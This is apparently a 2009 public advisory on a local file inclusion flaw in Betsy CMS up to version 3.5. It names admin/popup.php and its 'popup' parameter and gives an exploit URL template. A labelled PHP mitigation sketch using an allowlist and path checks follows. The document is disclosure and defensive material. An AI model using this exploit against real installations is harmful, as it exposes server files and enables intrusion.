# Title : Betsy CMS versions <= 3.5 Local File Inclusion Vulnerability
# Published : 2009-11-21
# Author : MizoZ
/*
Author : MizoZ [from MA]
Group : EvilWay
Email : mizozx[at]gmail[dot]com
Greetz : Zuka !!
Good luck DZ :)
*/
The vulnerability is in the file admin/popup.php, in its handling of the GET parameter $_GET['popup'].
Exploit :
[HOST]/[PATH]/admin/popup.php?popup=[FILE, INCLUDED RELATIVE TO admin/]
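
Mitigation sketch (an added example, not Betsy CMS code; the source of admin/popup.php is not shown on this page): the request value is used only as a key into a fixed allowlist and never as a path, and the resolved file is then checked to sit inside the base directory. The names `ALLOWED_POPUPS` and `resolve_popup` and the popup file names are assumptions.

```php
<?php
// Added example: hypothetical hardened handling of the `popup` parameter.
// ALLOWED_POPUPS and the file names in it are assumptions, not project code.
const ALLOWED_POPUPS = [
    'help'    => 'popups/help.php',
    'preview' => 'popups/preview.php',
];

/**
 * Map a request value to a file under $baseDir, or return null.
 * The request value is only ever an array key, never part of a path.
 */
function resolve_popup($value, string $baseDir): ?string
{
    // Reject arrays (popup[]=x) and anything that is not a short identifier,
    // which rules out slashes, dots, NUL bytes and URL schemes in one step.
    if (!is_string($value) || !preg_match('/\A[a-z0-9_]{1,32}\z/', $value)) {
        return null;
    }
    if (!array_key_exists($value, ALLOWED_POPUPS)) {
        return null;
    }
    // Defence in depth: the target must exist and resolve to a location
    // inside $baseDir, which also catches symlinks pointing elsewhere.
    $base = realpath($baseDir);
    $file = realpath($baseDir . DIRECTORY_SEPARATOR . ALLOWED_POPUPS[$value]);
    if ($base === false || $file === false) {
        return null;
    }
    if (strncmp($file, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $file;
}

// Usage in a page such as admin/popup.php:
$target = resolve_popup($_GET['popup'] ?? null, __DIR__);
if ($target === null) {
    http_response_code(404);
    exit('Unknown popup');
}
require $target;
```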